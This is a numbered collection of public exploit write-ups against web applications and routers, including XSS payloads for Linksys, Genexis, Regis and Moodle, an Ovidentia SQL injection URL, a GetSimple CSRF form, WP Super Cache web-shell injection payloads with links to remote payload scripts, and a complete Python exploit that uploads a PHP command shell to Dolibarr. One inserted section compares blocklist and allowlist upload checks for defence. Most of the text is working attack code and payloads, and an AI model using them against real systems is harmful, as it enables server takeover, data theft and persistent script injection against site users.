# Caused by outdated jQuery(strInput) version : <= 1.7.1 (Fixed in version 1.9.0)
# Credit also to Reddit user michael1026

### POC ###

1. When logging into the router (http://LHOST or http://LHOST:10080), choose "Click Here" next to "Dont Have an Account? " or choose "click here" after "To login with your Linksys Smart Wi-Fi account"; you will be redirected to a login prompt with both Email Address and Password forms.
2. Make your email address "<img src=0 onerror=alert(XSS)>" without the double quotes.
3. The payload will be triggered when the mouse is clicked anywhere within the Email Address form box or when the form is submitted.
19. # Exploit Title: Ovidentia 6 - 'id' SQL injection (Authenticated)
# Exploit Author: Felipe Prates Donato (m4ud)
# Vendor Homepage: http://www.ovidentia.org
# Version: 6
# DORK : "Powered by Ovidentia"

http://Site/ovidentia/index.php?tg=delegat&idx=mem&id=1 UNION Select (select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from information_Schema.COLUMNS where TABLE_SCHEMA = 'mysql'),2--
20. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting
# Date: 03/25/2020
# Exploit Author: Jithin KS
# Vendor Homepage: https://www.gxgroup.eu/ont-products/
# Version: Platinum-4410 Software version - P4410-V2-1.31A
# Tested on: Windows 10
# Author Contact: https://twitter.com/jithinks_8 <https://twitter.com/amalmohandas0>

Vulnerability Details
======================
Genexis Platinum-4410 Home Gateway Unit is vulnerable to stored XSS in the "start_addr" parameter. This could allow attackers to perform a malicious action in which the XSS popup affects all privileged users.

How to reproduce
===================
1. Login to the firmware as any user
2. Navigate to Manage tab --> Security Management
3. Enter any valid value in Start Source Address and fill all other fields. Click Add.
4. Capture this request in Burp Suite. Enter the payload <script>alert(1)</script> in the "start_addr" text box and forward the request.
5. Relogin as any user and again navigate to Manage tab --> Security Management
6. Observe the XSS popup showing persistent XSS
21. # Exploit Title: Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)
# Date: 16/06/2020
# Exploit Author: Andrea Gonzalez
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://github.com/Dolibarr/dolibarr
# Version: Prior to 11.0.5
# Tested on: Debian 9.12
# CVE : CVE-2020-14209

#!/usr/bin/python3
# Choose between 3 types of exploitation: extension-bypass, file-renaming or htaccess.
# If no option is selected, all 3 methods are tested.

import re
import sys
import random
import string
import argparse
import requests
import urllib.parse
from urllib.parse import urlparse

session = requests.Session()
base_url = "http://127.0.0.1/htdocs/"
documents_url = "http://127.0.0.1/documents/"
proxies = {}
user_id = -1


class bcolors:
    BOLD = '\033[1m'
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'


def printc(s, color):
    print(f"{color}{s}{bcolors.ENDC}")


def read_args():
    parser = argparse.ArgumentParser(description='Dolibarr exploit - Choose one or more methods (extension-bypass, htaccess, file-renaming). If no method is chosen, every method is tested.')
    parser.add_argument('base_url', metavar='base_url', help='Dolibarr base URL.')
    parser.add_argument('-d', '--documents-url', dest='durl', help='URL where uploaded documents are stored (default is base_url/../documents/).')
    parser.add_argument('-c', '--command', dest='cmd', default="id", help='Command to execute (default "id").')
    parser.add_argument('-x', '--proxy', dest='proxy', help='Proxy to be used.')
    parser.add_argument('--extension-bypass', dest='fbypass', action='store_true', default=False, help='Files with executable extensions are uploaded trying to bypass the file extension blacklist.')
    parser.add_argument('--file-renaming', dest='frenaming', action='store_true', default=False, help='A PHP script is uploaded and .php extension is added using file renaming function.')
    parser.add_argument('--htaccess', dest='htaccess', action='store_true', default=False, help='Apache .htaccess file is uploaded so files with .noexe extension can be executed as a PHP script.')
    required = parser.add_argument_group('required named arguments')
    required.add_argument('-u', '--user', help='Username', required=True)
    required.add_argument('-p', '--password', help='Password', required=True)
    return parser.parse_args()


def error(s, end=False):
    printc(s, bcolors.HEADER)
    if end:
        sys.exit(1)


def login(user, password):
    """Returns user id (-1 on failure)"""
    data = {
        "actionlogin": "login",
        "loginfunction": "loginfunction",
        "username": user,
        "password": password
    }
    login_url = urllib.parse.urljoin(base_url, "index.php")
    r = session.post(login_url, data=data, proxies=proxies)
    try:
        regex = re.compile(r"user/card.php\?id=(\d+)")
        match = regex.search(r.text)
        return int(match.group(1))
    except Exception as e:
        #error(e)
        return -1


def upload(filename, payload):
    files = {
        "userfile": (filename, payload),
    }
    data = {
        "sendit": "Send file"
    }
    headers = {
        "Referer": base_url
    }
    upload_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
    session.post(upload_url, files=files, headers=headers, data=data, proxies=proxies)


def delete(filename):
    data = {
        "action": "confirm_deletefile",
        "confirm": "yes",
        "urlfile": filename
    }
    headers = {
        "Referer": base_url
    }
    delete_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
    session.post(delete_url, headers=headers, data=data, proxies=proxies)


def rename(filename, new_filename):
    data = {
        "action": "renamefile",
        "modulepart": "user",
        "renamefilefrom": filename,
        "renamefileto": new_filename,
        "renamefilesave": "Save"
    }
    headers = {
        "Referer": base_url
    }
    rename_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
    session.post(rename_url, headers=headers, data=data, proxies=proxies)


def test_payload(filename, payload, query, headers={}):
    file_url = urllib.parse.urljoin(documents_url, "users/%d/%s?%s" % (user_id, filename, query))
    r = session.get(file_url, headers=headers, proxies=proxies)
    if r.status_code != 200:
        error("Error %d %s" % (r.status_code, file_url))
    elif payload in r.text:
        # the source came back verbatim, so the server did not execute it
        error("Non-executable %s" % file_url)
    else:
        printc("Payload was successful! %s\nOutput: %s" % (file_url, r.text.strip()), bcolors.OKGREEN)
        return True
    return False


def get_random_filename():
    return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8))


def upload_executable_file_php(payload, query):
    php_extensions = [".php", ".pht", ".phpt", ".phar", ".phtml", ".php3", ".php4", ".php5", ".php6", ".php7"]
    random_filename = get_random_filename()
    b = False
    for extension in php_extensions:
        filename = random_filename + extension
        upload(filename, payload)
        if test_payload(filename, payload, query):
            b = True
    return b


def upload_executable_file_ssi(payload, command):
    filename = get_random_filename() + ".shtml"
    upload(filename, payload)
    return test_payload(filename, payload, '', headers={'ACCEPT': command})


def upload_and_rename_file(payload, query):
    # Dolibarr stores the .php upload as .php.noexe; the rename function gives the extension back
    filename = get_random_filename() + ".php"
    upload(filename, payload)
    rename(filename + ".noexe", filename)
    return test_payload(filename, payload, query)


def upload_htaccess(payload, query):
    filename = get_random_filename() + ".noexe"
    upload(filename, payload)
    filename_ht = get_random_filename() + ".htaccess"
    upload(filename_ht, "AddType application/x-httpd-php .noexe\nAddHandler application/x-httpd-php .noexe\nOrder deny,allow\nAllow from all\n")
    delete(".htaccess")
    rename(filename_ht, ".htaccess")
    return test_payload(filename, payload, query)


if __name__ == "__main__":
    args = read_args()
    base_url = args.base_url if args.base_url[-1] == '/' else args.base_url + '/'
    documents_url = args.durl if args.durl else urllib.parse.urljoin(base_url, "../documents/")
    documents_url = documents_url if documents_url[-1] == '/' else documents_url + '/'
    user = args.user
    password = args.password
    payload = "<?php system($_GET['cmd']) ?>"
    payload_ssi = '<!--#exec cmd="$HTTP_ACCEPT" -->'
    command = args.cmd
    query = "cmd=%s" % command
    if args.proxy:
        proxies = {"http": args.proxy, "https": args.proxy}

    user_id = login(user, password)
    if user_id < 0:
        error("Login error", True)
    printc("Successful login, user id found: %d" % user_id, bcolors.OKGREEN)
    print('-' * 30)

    if not args.fbypass and not args.frenaming and not args.htaccess:
        args.fbypass = args.frenaming = args.htaccess = True

    if args.fbypass:
        printc("Trying extension-bypass method\n", bcolors.BOLD)
        b = upload_executable_file_php(payload, query)
        b = upload_executable_file_ssi(payload_ssi, command) or b
        if b:
            printc("\nextension-bypass was successful", bcolors.OKBLUE)
        else:
            printc("\nextension-bypass was not successful", bcolors.WARNING)
        print('-' * 30)

    if args.frenaming:
        printc("Trying file-renaming method\n", bcolors.BOLD)
        if upload_and_rename_file(payload, query):
            printc("\nfile-renaming was successful", bcolors.OKBLUE)
        else:
            printc("\nfile-renaming was not successful", bcolors.WARNING)
        print('-' * 30)

    if args.htaccess:
        printc("Trying htaccess method\n", bcolors.BOLD)
        if upload_htaccess(payload, query):
            printc("\nhtaccess was successful", bcolors.OKBLUE)
        else:
            printc("\nhtaccess was not successful", bcolors.WARNING)
        print('-' * 30)
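All three methods in the script above defeat one design choice: an extension blocklist applied only at upload time. Alternative PHP extensions slip past the list, a rename to `.php` is never re-checked, and an uploaded `.htaccess` redefines which extensions Apache executes. The following is an added example, not Dolibarr's code: a blocklist check in the same spirit beside an allowlist check that also rejects dotfiles and double extensions, with a rename gate that reapplies the policy to the target name. Both are run against the exact filenames the exploit uploads. The contents of `BLOCKLIST` and `ALLOWLIST` are illustrative assumptions, not the lists Dolibarr 11.0.4 or 11.0.5 ship.

```python
import os
import re
from typing import Callable, List

# Blocklist in the style the exploit defeats (illustrative, not Dolibarr's actual list).
BLOCKLIST = {".php", ".php3", ".php4", ".php5", ".phtml"}


def blocklist_allows(filename: str) -> bool:
    """Vulnerable pattern: refuse a few known-bad extensions, accept everything else."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLOCKLIST


# Hardened pattern: name must be a plain filename, every extension must be on the allowlist.
ALLOWLIST = {".pdf", ".png", ".jpg", ".jpeg", ".gif", ".txt", ".csv", ".odt", ".docx", ".xlsx"}
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$")


def allowlist_allows(filename: str) -> bool:
    """Reject dotfiles (.htaccess), path characters, unknown extensions and
    inner extensions such as shell.php.png."""
    if not _SAFE_NAME.match(filename):
        return False
    base, ext = os.path.splitext(filename)
    if ext.lower() not in ALLOWLIST:
        return False
    inner = os.path.splitext(base)[1].lower()
    return inner == "" or inner in ALLOWLIST


def rename_allowed(old: str, new: str, policy: Callable[[str], bool]) -> bool:
    """A rename is an upload under another name, so the target gets the same check.
    The file-renaming method above works because the vulnerable code skipped this."""
    return policy(old) and policy(new)


# Filenames the exploit above uploads (random stem replaced by 'x'), plus the final .htaccess.
EXPLOIT_NAMES = [
    "x.php", "x.pht", "x.phpt", "x.phar", "x.phtml", "x.php3", "x.php4", "x.php5",
    "x.php6", "x.php7", "x.shtml", "x.noexe", "x.htaccess", ".htaccess",
]


def survivors(policy: Callable[[str], bool]) -> List[str]:
    """Which of the exploit's filenames a given policy would have accepted."""
    return [name for name in EXPLOIT_NAMES if policy(name)]


if __name__ == "__main__":
    print("blocklist accepts:", survivors(blocklist_allows))
    print("allowlist accepts:", survivors(allowlist_allows))
    print("rename x.noexe -> x.php under blocklist:", rename_allowed("x.noexe", "x.php", blocklist_allows))
```

The blocklist result is the interesting one: `.phar`, `.phtml` variants, `.shtml`, `.noexe` and `.htaccess` all pass, which is exactly the set the three methods rely on. Note that even the blocklist closes the rename path once it is applied to the rename target; the real fix is still the allowlist, because `.htaccess` and server-side includes are not PHP extensions and will never be on a PHP blocklist.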
22. # Title: Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting
# Exploit Author: George Tsimpidas
# Date: 2021-03-25
# Vendor Homepage: www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/regis_inventory.zip
# Version : 1.0.0
# Tested on: Kali Linux 2020.4
# Category: Webapp

# Description
Regis Inventory And Monitoring System suffers from a stored cross site scripting on the Item's List category.

#PoC
1. Login as admin : http://localhost/regis_inventory/index.php
2. Visit : http://localhost/regis_inventory/item.php
3. Click add a New Item and input your payload in the "Generic Name" textbox.
   Payload : <script>alert("XSS")</script>
4. After inputting the Item values and submitting the form, it will trigger an XSS pop-up
23. # Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - 'customhs_js_content' Cross-Site Request Forgery
# Exploit Author: Abhishek Joshi
# Date: March 25, 2021
# Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download
# Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip
# Version: 0.1
# Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10
# Tested against: Firefox 78.7.0esr (64-bit)

# Vulnerability Description:
# Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting) when an authenticated admin visits a third-party site.

## CSRF POST Form Method

<html><body>
<form action="http://mygetsimplecms.local/admin/load.php?id=CustomJSPlugin" method="POST">
<input type="hidden" name="customjs_url_content" value="">
<input type="hidden" name="customjs_js_content" value="alert('Hello Abhishek Joshi from CSRF --> XSS all the things!')">
<input type="hidden" name="submit" value="Save Settings">
<input type="submit" value="Submit request">
</form>
</body></html>
24. # Exploit Title: Moodle 3.10.3 - 'label' Persistent Cross Site Scripting
# Date: 25.03.2021
# Author: Vincent666 ibn Winnie
# Software Link: https://moodle.org/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month

Choose a role : Student (example)

Open calendar : https://school.localhost/calendar/view.php?view=month

Create new event:

Example:
Event Title "Test"
Description : Choose Insert Video File and choose Video:
Video Source Url: you can paste a video link from YouTube
And open Subtitles and Captions:
Subtitle track URL: use a video link from YouTube
Field Label : here we can use xss code:

<img src="1" onerror="alert(1)" />

or try in base64

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>

Insert Media and save this.

Open event and get stored xss.

POST: https://school.localhost/lib/ajax/service.php?sesskey=vCHlHS7oIl&info=core_calendar_submit_create_update_form
Host: school.localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 996
Origin: https://school.localhost
Connection: keep-alive
Referer: https://school.localhost/calendar/view.php?view=month
Cookie: MoodleSession=4ea0036558425526decc096ed375b886; EU_COOKIE_LAW_CONSENT=true

[{"index":0,"methodname":"core_calendar_submit_create_update_form","args":{"formdata":"id=0&userid=56&modulename=&instance=0&visible=1&eventtype=user&sesskey=vCHlHS7oIl&_qf__core_calendar_local_event_forms_create=1&mform_showmore_id_general=1&name=test&timestart%5Bday%5D=25&timestart%5Bmonth%5D=3&timestart%5Byear%5D=2021&timestart%5Bhour%5D=10&timestart%5Bminute%5D=4&description%5Btext%5D=%3Cp%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%3E%26nbsp%3B%3Cvideo%20controls%3D%22true%22%3E%3Csource%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%3E%3Ctrack%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%20kind%3D%22subtitles%22%20srclang%3D%22en%22%20label%3D%22%3Cimg%20src%3D%26quot%3B1%26quot%3B%20onerror%3D%26quot%3Balert(1)%26quot%3B%20%2F%3E%22%3Ehttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%3C%2Fvideo%3E%26nbsp%3B%3Cbr%3E%3C%2Fp%3E&description%5Bformat%5D=1&description%5Bitemid%5D=495874277&location=&duration=0"}}]
25. # Exploit Title: WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)
# Google Dork: inurl:/wp-content/plugins/wp-super-cache/
# Date: 2021-03-13
# Exploit Author: m0ze
# Version: <= 1.7.1
# Software Link: https://wordpress.org/plugins/wp-super-cache/

### -- [ Info: ]

[i] An Authenticated RCE vulnerability was discovered in the WP Super Cache plugin through 1.7.1 for WordPress.
[i] RCE due to input validation failure and weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection.
[i] Another possible attack vector: from XSS to RCE.

### -- [ Impact: ]

[~] Full compromise of the vulnerable web application and also the web server.

### -- [ Payloads: ]

[$] ';system($_GET[13]);include_once \'wp-cache-config.php\';'
[$] ';`$_GET[13]`;include_once \'wp-cache-config.php\';?><!--
[$] ';`$_GET[13]`;#

### -- [ PoC #1 | Authenticated RCE | Cache Location: ]

[!]
POST /wp-admin/options-general.php?page=wpsupercache&tab=settings HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 501
Cookie: [cookies]

_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fyour%2Fown%2Fpath%2Fexample.com%2Fwp-content%2Fcache%2F%27%3Bsystem%28%24_GET%5B13%5D%29%3Binclude_once+%5C%27wp-cache-config.php%5C%27%3B%27&_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings

### -- [ PoC #2 | From XSS to RCE | Cache Location: ]

[!] https://m0ze.ru/payload/wp-super-cache-rce.js
[!] https://m0ze.ru/payload/wp-super-cache-rce-j.js